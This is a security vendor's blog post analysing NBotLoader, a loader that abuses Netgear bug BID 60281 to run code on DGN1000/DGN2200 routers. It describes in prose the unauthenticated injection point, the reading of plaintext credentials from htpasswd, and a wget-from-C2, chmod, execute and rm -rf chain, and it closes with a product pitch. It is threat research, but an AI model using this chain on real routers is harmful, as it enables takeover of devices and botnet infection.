NBotLoader: Netgear Bug Weaponized as a Dangerous Exploit

April 17, 2018
Scott Wu

In the field of malware development, one important factor is the extent of collaboration and sharing between malware authors. This sharing of resources lends malware to be quantified as “MaaS” or Malware as a Service. As the malware code is shared and is more readily available among threat actors, the probability also increases that its usage is more widespread.

The malware for Internet of Things aligns with this trend. It is often observed that when malicious code is readily available, it causes more havoc as it generally leads to more re-use by “script kiddies” (copy-and-paste low-skilled hackers) and thus new variants come into the picture. BASHLITE was one example where several variants were forked once the source code was leaked.

We recently observed that a known bug in some Netgear routers (better known as Bug ID 60281) has been weaponized in hacking forums to act as an IoT botnet loader, referred as NBotLoader.

Advantages of Using an IoT Bug

An IoT bug is a useful resource for attackers since they do not have to depend on brute forcing of default credentials. Even if the target implements a strong password policy, they can become compromised if the IoT device is unpatched. Also, compared to Windows systems that are often updated automatically, in general IoT devices are not updated as regularly. Thus, an unpatched device can be vulnerable for longer periods of time and can be a prime target for the attackers.

The Concept of BID 60281

BID 60281 is a well-known bug which can result in unauthorized arbitrary code execution in NetGear routers DGN1000 and DGN2200 (which are not patched). While accessing cgi.sys, if the URL contains “currentsetting.htm” and executable code is injected in between, it will run even without authentication. The result is that an attacker with rudimentary skills could craft a URL to execute arbitrary code despite not having necessary privileges.

BID 60281 in Action

If one tries to access a NetGear router vulnerable to Bug 60281, an authentication window will challenge him as shown below:

Figure 1. Authentication Required

Without the correct credentials, access will be refused and the attacker will see the following:

Figure 2. Authentication Failed

However, if one uses a crafted URL by querying cgi.sys with currentsetting.htm, injected code can be executed. In the below case, we try to do the same with our unpatched NetGear test box. The command injected is to perform a syscmd to access htpasswd files. This file contains username and credentials in plaintext, and is obviously not intended to be accessed by anyone not having proper privileges:

Figure 3. Specially crafted URL to execute instructions

We can observe that the injected command runs, and without any authentication, we can view the plaintext credentials. We did a lookup with Shodan and found that despite it being a known bug, several vulnerable devices are exposed to internet.

Figure 4. Netgear vulnerable box

The weaponized code is using the same vulnerability as BID 60281, but it is more elaborate than the Proof of Concept which exposes only credentials. The entire attack cycle of NbotLoader is described in the flowchart below:

Figure 5. NBotLoader Flowchart

The script takes two parameters; one is the IP address of the target Netgear router, and the other is the command and control server where the malicious payload will be hosted, as shown in the figure below.

Figure 6. Python script

NBotLoader has a validation routine which checks whether the victim IP is a valid external address and hence suitable for exploitation. For this it has a known pre-fixed list of internal IP ranges (namely 127.0, 10.0 and 192.168). If the IP matches these, the script will not proceed with the exploitation attempt.

Once the IP is validated, the script will run the vulnerability to check if the NetGear router is hackable. This part is pretty much like the proof of concept of Bug 60281 (i.e. code injection) to access the htpasswd files which contains credentials of the router in plaintext.

Image 7. Python script

The script logic assumes that if the exploitation will be successful, the username and password will be returned in plaintext. It further checks the string “admin” in the response (assuming this must be one of the usernames). If it is found, the validation is complete and the script attempts to exploit the vulnerability by executing the infection module as shown in the figure below:

Figure 8. Python script

The infection module will:

  • Perform a WGET via syscmd to download the payload from C2 with the expected name ntpd. (Coincidentally, this same disguised payload name has been actively used by elf binaries belonging to BASHLITE and Mirai IoT botnet families.)
  • Provide executable rights to the downloaded binary by chmod777 and run the file.
  • Post execution, do trace deletion by using rm-rf.

Introducing a BID 60281 Scanner

NbotLoader is not the only piece of code related to Bug ID 60281 that is moving around in hack forums. In a different hacking forum, we observed that another script is being freely shared which is used to simply scan and locate vulnerable Netgear devices (unpatched from Bug ID 60281). In this case, the unauthorized code execution is simply “echo lolimgay”.

Figure 9. Code shared in forum

If the vulnerability is successful, the command will be executed and the response will contain the string echoed. The same is checked in the script as shown in the figure below:

Figure 10. Python script

While hunting for binaries which might have used this code, we indeed found ELF executables that are using the same code (as can be seen in its disassembly. The ELF had 0 static detection on Virustotal at the time of its submission.

Figure 11. Disassembly

Conclusion & Remediation

In the threat landscape of Windows, known vulnerabilities have often been noted to be weaponized. However, we now see a parallel process in the IoT exploit threat landscape where a known vulnerability is altered to exploit via collaboration in hacker forums, resulting in a full-blown loader for potentially several elf binary botnets. This loader will be equally effective even if the password is strong.

Since this was uploaded on a membership only hacker forum for free, more people could abuse it.

NewSky Security’s IoT Halo detects Bug ID 60281 at both proactive and reactive levels. If NbotLoader or a similar script tries to compromise a router configured with IoT Halo, the traffic will be stalled and exploitation will be rendered ineffective. On a reactive level, ergo in cases where IOT Halo is deployed post-exploitation, detection and blocking will still take place based on the payload botnet behavior.

For more on NewSky security’s’ IoT Halo, please refer to https://www.newskysecurity.com/IoTcontainer.html

  • Security